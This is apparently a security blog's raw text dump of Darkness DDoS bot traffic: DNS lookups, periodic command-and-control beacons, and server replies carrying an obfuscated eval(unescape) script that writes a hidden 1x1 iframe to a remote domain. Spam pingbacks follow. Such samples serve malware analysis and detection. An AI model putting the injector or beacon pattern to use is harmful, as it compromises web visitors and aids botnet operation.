Darkness DDoS Malware Botnet PCAP Converted Traffic Sample

By | June 20, 2015

2011-01-17 16:39:20.442096 IP 172.16.3.27.1025 > 172.16.1.1.53: 28850+ A? vkotalke[.]info. (31)
E..;……………….5.’..p…………vkotalke[.]info…..
2011-01-17 16:39:21.439208 IP 172.16.3.27.1025 > 172.16.1.1.53: 28850+ A? vkotalke[.]info. (31)
E..;…….z………..5.’..p…………vkotalke[.]info…..
2011-01-17 16:39:21.538379 IP 172.16.1.1.53 > 172.16.3.27.1025: 28850* 1/0/0 A 195.189.226.193 (47)
E..K..@.@..e………5…7\.p…………vkotalke[.]info…………………
2011-01-17 16:39:21.541319 IP 172.16.1.1.53 > 172.16.3.27.1025: 28850* 1/0/0 A 195.189.226.193 (47)
E..K..@.@..e………5…7\.p…………vkotalke[.]info…………………
2011-01-17 16:39:21.548295 IP 172.16.3.27.1040 > 195.189.226.193.80: Flags [S], seq 1376765197, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…………….PR…….p……………
2011-01-17 16:39:22.290828 IP 195.189.226.193.80 > 172.16.3.27.1040: Flags [S.], seq 1691404055, ack 1376765198, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.5…………P..d…R…p……………
2011-01-17 16:39:22.290980 IP 172.16.3.27.1040 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(..@….$………..PR…d…P………….
2011-01-17 16:39:22.291158 IP 172.16.3.27.1040 > 195.189.226.193.80: Flags [P.], seq 1:154, ack 1, win 65535, length 153
E…..@…………….PR…d…P…. ..GET /index.php?uid=587609&ver=8g%20XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:39:23.208331 IP 195.189.226.193.80 > 172.16.3.27.1040: Flags [.], ack 154, win 6432, length 0
E..(@.@.6…………P..d…R…P.. . ..
2011-01-17 16:39:23.214052 IP 195.189.226.193.80 > 172.16.3.27.1040: Flags [P.], seq 1:521, ack 154, win 6432, length 520
E..0@.@.6..}………P..d…R…P.. .K..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:39:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 318

d3Rm<script>eval(unescape(‘%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29’));</script><!– uy7gdr5332rkmn –>
2011-01-17 16:39:23.214063 IP 195.189.226.193.80 > 172.16.3.27.1040: Flags [F.], seq 521, ack 154, win 6432, length 0
E..(@.@.6…………P..d.. R…P.. ….
2011-01-17 16:39:23.214290 IP 172.16.3.27.1040 > 195.189.226.193.80: Flags [.], ack 522, win 65015, length 0
E..(..@….”………..PR…d..!P….)……..
2011-01-17 16:39:23.216065 IP 172.16.3.27.1040 > 195.189.226.193.80: Flags [F.], seq 154, ack 522, win 65015, length 0
E..(..@….!………..PR…d..!P….(……..
2011-01-17 16:39:24.035849 IP 195.189.226.193.80 > 172.16.3.27.1040: Flags [.], ack 155, win 6432, length 0
E..(..@.6..%………P..d..!R…P.. ….
2011-01-17 16:39:54.204669 IP 172.16.3.27.1041 > 195.189.226.193.80: Flags [S], seq 176083077, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….p………..P
~……p…N………..
2011-01-17 16:39:54.962267 IP 195.189.226.193.80 > 172.16.3.27.1041: Flags [S.], seq 2195977977, ack 176083078, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.6…………P……
~..p……………
2011-01-17 16:39:54.962399 IP 172.16.3.27.1041 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(..@….b………..P
~……P………….
2011-01-17 16:39:54.962564 IP 172.16.3.27.1041 > 195.189.226.193.80: Flags [P.], seq 1:152, ack 1, win 65535, length 151
E…..@…………….P
~……P…-`..GET /index.php?uid=587609&ver=8g*XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:39:55.756901 IP 195.189.226.193.80 > 172.16.3.27.1041: Flags [.], ack 152, win 6432, length 0
E..(b.@.6..u………P……
~..P.. ….
2011-01-17 16:39:55.759332 IP 195.189.226.193.80 > 172.16.3.27.1041: Flags [P.], seq 1:517, ack 152, win 6432, length 516
E..,b.@.6..p………P……
~..P.. !…HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:39:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 314

<script>eval(unescape(‘%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29’));</script><!– uy7gdr5332rkmn –>
2011-01-17 16:39:55.759341 IP 195.189.226.193.80 > 172.16.3.27.1041: Flags [F.], seq 517, ack 152, win 6432, length 0
E..(b.@.6..s………P……
~..P.. .)..
2011-01-17 16:39:55.759557 IP 172.16.3.27.1041 > 195.189.226.193.80: Flags [.], ack 518, win 65019, length 0
E..(..@….<………..P
~……P….N……..
2011-01-17 16:39:55.759748 IP 172.16.3.27.1041 > 195.189.226.193.80: Flags [F.], seq 152, ack 518, win 65019, length 0
E..(..@….;………..P
~……P….M……..
2011-01-17 16:39:56.614923 IP 195.189.226.193.80 > 172.16.3.27.1041: Flags [.], ack 153, win 6432, length 0
E..(..@.6..%………P……
~..P.. .(..
2011-01-17 16:40:25.750397 IP 172.16.3.27.1042 > 195.189.226.193.80: Flags [S], seq 2963602687, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0
.@…………….P……..p…{n……….
2011-01-17 16:40:26.115682 IP 195.189.226.193.80 > 172.16.3.27.1042: Flags [S.], seq 2697242736, ack 2963602688, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.6…………P…..p….p……………
2011-01-17 16:40:26.115809 IP 172.16.3.27.1042 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(
.@….!………..P…….qP…^………
2011-01-17 16:40:26.115943 IP 172.16.3.27.1042 > 195.189.226.193.80: Flags [P.], seq 1:152, ack 1, win 65535, length 151
E…
.@…………….P…….qP….f..GET /index.php?uid=587609&ver=8g*XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:40:26.503642 IP 195.189.226.193.80 > 172.16.3.27.1042: Flags [.], ack 152, win 6432, length 0
E..(..@.6…………P…..q….P.. E5..
2011-01-17 16:40:26.509388 IP 195.189.226.193.80 > 172.16.3.27.1042: Flags [P.], seq 1:517, ack 152, win 6432, length 516
E..,..@.6…………P…..q….P.. ….HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:40:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 314

<script>eval(unescape(‘%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29’));</script><!– uy7gdr5332rkmn –>
2011-01-17 16:40:26.509399 IP 195.189.226.193.80 > 172.16.3.27.1042: Flags [F.], seq 517, ack 152, win 6432, length 0
E..(. @.6…………P…..u….P.. C0..
2011-01-17 16:40:26.509621 IP 172.16.3.27.1042 > 195.189.226.193.80: Flags [.], ack 518, win 65019, length 0
E..(
.@…………….P…….vP…^T……..
2011-01-17 16:40:26.509804 IP 172.16.3.27.1042 > 195.189.226.193.80: Flags [F.], seq 152, ack 518, win 65019, length 0
E..(
.@…………….P…….vP…^S……..
2011-01-17 16:40:26.938055 IP 195.189.226.193.80 > 172.16.3.27.1042: Flags [.], ack 153, win 6432, length 0
E..(..@.6..%………P…..v….P.. C/..
2011-01-17 16:40:56.500038 IP 172.16.3.27.1043 > 195.189.226.193.80: Flags [S], seq 3885989451, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.8@…………….P..~K….p….&……….
2011-01-17 16:40:57.099359 IP 195.189.226.193.80 > 172.16.3.27.1043: Flags [S.], seq 3183627503, ack 3885989452, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.6…………P….L…~Lp….5……….
2011-01-17 16:40:57.100604 IP 172.16.3.27.1043 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(.^@…………….P..~L..L.P….’……..
2011-01-17 16:40:57.100620 IP 172.16.3.27.1043 > 195.189.226.193.80: Flags [P.], seq 1:152, ack 1, win 65535, length 151
E…._@…./………..P..~L..L.P…….GET /index.php?uid=587609&ver=8g*XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:40:57.839348 IP 195.189.226.193.80 > 172.16.3.27.1043: Flags [.], ack 152, win 6432, length 0
E..(.`@.6…………P….L…~.P.. .p..
2011-01-17 16:40:57.842892 IP 195.189.226.193.80 > 172.16.3.27.1043: Flags [P.], seq 1:517, ack 152, win 6432, length 516
E..,.a@.6…………P….L…~.P.. .U..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:40:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 314

<script>eval(unescape(‘%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29’));</script><!– uy7gdr5332rkmn –>
2011-01-17 16:40:57.842902 IP 195.189.226.193.80 > 172.16.3.27.1043: Flags [F.], seq 517, ack 152, win 6432, length 0
E..(.b@.6…………P….N…~.P.. .k..
2011-01-17 16:40:57.843119 IP 172.16.3.27.1043 > 195.189.226.193.80: Flags [.], ack 518, win 65019, length 0
E..(.r@…………….P..~…N.P………….
2011-01-17 16:40:57.843304 IP 172.16.3.27.1043 > 195.189.226.193.80: Flags [F.], seq 152, ack 518, win 65019, length 0
E..(.s@…………….P..~…N.P………….
2011-01-17 16:40:58.553905 IP 195.189.226.193.80 > 172.16.3.27.1043: Flags [.], ack 153, win 6432, length 0
E..(..@.6..%………P….N…~.P.. .j..
2011-01-17 16:41:27.843515 IP 172.16.3.27.1044 > 195.189.226.193.80: Flags [S], seq 291733755, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….B………..P.c……p……………
2011-01-17 16:41:28.380701 IP 195.189.226.193.80 > 172.16.3.27.1044: Flags [S.], seq 3685198463, ack 291733756, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.6…………P…….c..p….K……….
2011-01-17 16:41:28.380819 IP 172.16.3.27.1044 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(..@….7………..P.c……P…=>……..
2011-01-17 16:41:28.380972 IP 172.16.3.27.1044 > 195.189.226.193.80: Flags [P.], seq 1:152, ack 1, win 65535, length 151
E…..@…………….P.c……P…i…GET /index.php?uid=587609&ver=8g*XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:41:29.089950 IP 195.189.226.193.80 > 172.16.3.27.1044: Flags [.], ack 152, win 6432, length 0
E..(.I@.6…………P…….c..P.. #…
2011-01-17 16:41:29.096378 IP 195.189.226.193.80 > 172.16.3.27.1044: Flags [P.], seq 1:517, ack 152, win 6432, length 516
E..,.J@.6…………P…….c..P.. hj..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:41:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 314

<script>eval(unescape(‘%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29’));</script><!– uy7gdr5332rkmn –>
2011-01-17 16:41:29.096390 IP 195.189.226.193.80 > 172.16.3.27.1044: Flags [F.], seq 517, ack 152, win 6432, length 0
E..(.K@.6…………P…….c..P.. !…
2011-01-17 16:41:29.096606 IP 172.16.3.27.1044 > 195.189.226.193.80: Flags [.], ack 518, win 65019, length 0
E..(..@…………….P.c……P…<………
2011-01-17 16:41:29.096784 IP 172.16.3.27.1044 > 195.189.226.193.80: Flags [F.], seq 152, ack 518, win 65019, length 0
E..(..@…………….P.c……P…<………
2011-01-17 16:41:29.852611 IP 195.189.226.193.80 > 172.16.3.27.1044: Flags [.], ack 153, win 6432, length 0
E..(..@.6..%………P…….c..P.. !…
2011-01-17 16:41:59.093181 IP 172.16.3.27.1045 > 195.189.226.193.80: Flags [S], seq 3306650629, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….(………..P..|…..p……………
2011-01-17 16:41:59.579926 IP 195.189.226.193.80 > 172.16.3.27.1045: Flags [S.], seq 4161845329, ack 3306650630, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.6…………P…..Q..|.p…!Q……….
2011-01-17 16:41:59.580044 IP 172.16.3.27.1045 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(. @…………….P..|….RP…dC……..
2011-01-17 16:41:59.580233 IP 172.16.3.27.1045 > 195.189.226.193.80: Flags [P.], seq 1:152, ack 1, win 65535, length 151
E….
@…………….P..|….RP…….GET /index.php?uid=587609&ver=8g*XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:42:00.153487 IP 195.189.226.193.80 > 172.16.3.27.1045: Flags [.], ack 152, win 6432, length 0
E..(|.@.6.rz………P…..R..|.P.. J…
2011-01-17 16:42:00.159343 IP 195.189.226.193.80 > 172.16.3.27.1045: Flags [P.], seq 1:517, ack 152, win 6432, length 516
E..,|.@.6.pu………P…..R..|.P.. .x..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:42:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 314

<script>eval(unescape(‘%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29’));</script><!– uy7gdr5332rkmn –>
2011-01-17 16:42:00.159502 IP 195.189.226.193.80 > 172.16.3.27.1045: Flags [F.], seq 517, ack 152, win 6432, length 0
E..(|.@.6.rx………P…..V..|.P.. H…
2011-01-17 16:42:00.159627 IP 172.16.3.27.1045 > 195.189.226.193.80: Flags [.], ack 518, win 65019, length 0
E..(..@…. ………..P..|….WP…c………
2011-01-17 16:42:00.159803 IP 172.16.3.27.1045 > 195.189.226.193.80: Flags [F.], seq 152, ack 518, win 65019, length 0
E..(..@…………….P..|….WP…c………
2011-01-17 16:42:00.626905 IP 195.189.226.193.80 > 172.16.3.27.1045: Flags [.], ack 153, win 6432, length 0
E..(..@.6..%………P…..W..|.P.. H…
2011-01-17 16:42:30.155435 IP 172.16.3.27.1046 > 195.189.226.193.80: Flags [S], seq 3733581295, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….9………..P……..p…\………..
2011-01-17 16:42:30.687017 IP 195.189.226.193.80 > 172.16.3.27.1046: Flags [S.], seq 362231731, ack 3733581296, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.6…………P….7…..p……………
2011-01-17 16:42:30.687137 IP 172.16.3.27.1046 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(..@…./………..P……7.P…;………
2011-01-17 16:42:30.687289 IP 172.16.3.27.1046 > 195.189.226.193.80: Flags [P.], seq 1:152, ack 1, win 65535, length 151
E…..@…………….P……7.P…hx..GET /index.php?uid=587609&ver=8g*XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:42:31.135078 IP 195.189.226.193.80 > 172.16.3.27.1046: Flags [.], ack 152, win 6432, length 0
E..(..@.6…………P….7…..P.. “G..
2011-01-17 16:42:31.138535 IP 195.189.226.193.80 > 172.16.3.27.1046: Flags [P.], seq 1:517, ack 152, win 6432, length 516
E..,..@.6…………P….7…..P.. e1..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:42:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 314

<script>eval(unescape(‘%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29’));</script><!– uy7gdr5332rkmn –>
2011-01-17 16:42:31.138624 IP 195.189.226.193.80 > 172.16.3.27.1046: Flags [F.], seq 517, ack 152, win 6432, length 0
E..(..@.6…………P….9…..P.. B..
2011-01-17 16:42:31.138781 IP 172.16.3.27.1046 > 195.189.226.193.80: Flags [.], ack 518, win 65019, length 0
E..(..@…………….P……9.P…;f……..
2011-01-17 16:42:31.138983 IP 172.16.3.27.1046 > 195.189.226.193.80: Flags [F.], seq 152, ack 518, win 65019, length 0
E..(. @…………….P……9.P…;e……..
2011-01-17 16:42:31.639012 IP 195.189.226.193.80 > 172.16.3.27.1046: Flags [.], ack 153, win 6432, length 0
E..(..@.6..%………P….9…..P.. A..
2011-01-17 16:43:01.139540 IP 172.16.3.27.1047 > 195.189.226.193.80: Flags [S], seq 1765697681, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….r………..Pi>h…..p…W>……….
2011-01-17 16:43:01.745576 IP 195.189.226.193.80 > 172.16.3.27.1047: Flags [S.], seq 848267084, ack 1765697682, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.6…………P..2..Li>h.p….#……….
2011-01-17 16:43:01.745710 IP 172.16.3.27.1047 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(..@….h………..Pi>h.2..MP………….
2011-01-17 16:43:01.745851 IP 172.16.3.27.1047 > 195.189.226.193.80: Flags [P.], seq 1:152, ack 1, win 65535, length 151
E…..@…………….Pi>h.2..MP…….GET /index.php?uid=587609&ver=8g*XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:43:02.339262 IP 195.189.226.193.80 > 172.16.3.27.1047: Flags [.], ack 152, win 6432, length 0
E..(Z.@.6…………P..2..Mi>i)P.. .^..
2011-01-17 16:43:02.344748 IP 195.189.226.193.80 > 172.16.3.27.1047: Flags [P.], seq 1:517, ack 152, win 6432, length 516
E..,Z.@.6…………P..2..Mi>i)P.. .G..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:43:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 314

<script>eval(unescape(‘%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29’));</script><!– uy7gdr5332rkmn –>
2011-01-17 16:43:02.344761 IP 195.189.226.193.80 > 172.16.3.27.1047: Flags [F.], seq 517, ack 152, win 6432, length 0
E..(Z.@.6…………P..2..Qi>i)P.. .Y..
2011-01-17 16:43:02.344973 IP 172.16.3.27.1047 > 195.189.226.193.80: Flags [.], ack 518, win 65019, length 0
E..(..@….V………..Pi>i)2..RP….}……..
2011-01-17 16:43:02.345146 IP 172.16.3.27.1047 > 195.189.226.193.80: Flags [F.], seq 152, ack 518, win 65019, length 0
E..(..@….U………..Pi>i)2..RP….|……..
2011-01-17 16:43:05.278196 IP 172.16.3.27.1047 > 195.189.226.193.80: Flags [F.], seq 152, ack 518, win 65019, length 0
E..(.1@…………….Pi>i)2..RP….|……..
2011-01-17 16:43:05.767282 IP 195.189.226.193.80 > 172.16.3.27.1047: Flags [.], ack 153, win 6432, length 0
E..(..@.6..%………P..2..Ri>i*P.. .X..
2011-01-17 16:43:32.344982 IP 172.16.3.27.1048 > 195.189.226.193.80: Flags [S], seq 764278873, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0”.@…………….P-..Y….p….&……….
2011-01-17 16:43:32.845359 IP 195.189.226.193.80 > 172.16.3.27.1048: Flags [S.], seq 1329512255, ack 764278874, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.6…………P..O>.?-..Zp….h……….
2011-01-17 16:43:32.845479 IP 172.16.3.27.1048 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(“.@…………….P-..ZO>.@P…![……..
2011-01-17 16:43:32.845659 IP 172.16.3.27.1048 > 195.189.226.193.80: Flags [P.], seq 1:152, ack 1, win 65535, length 151
E…”.@…………….P-..ZO>.@P…M…GET /index.php?uid=587609&ver=8g*XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:43:33.318859 IP 195.189.226.193.80 > 172.16.3.27.1048: Flags [.], ack 152, win 6432, length 0
E..(V(@.6…………P..O>.@-…P.. ….
2011-01-17 16:43:33.324405 IP 195.189.226.193.80 > 172.16.3.27.1048: Flags [P.], seq 1:517, ack 152, win 6432, length 516
E..,V)@.6…………P..O>.@-…P.. I…HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:43:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 314

<script>eval(unescape(‘%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29’));</script><!– uy7gdr5332rkmn –>

Share Button

2 thoughts on “Darkness DDoS Malware Botnet PCAP Converted Traffic Sample

  1. Pingback: click here link click click this link good site here is the site http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www

  2. Pingback: Joseph de Saram#Rhodium

Leave a Reply

Your email address will not be published. Required fields are marked *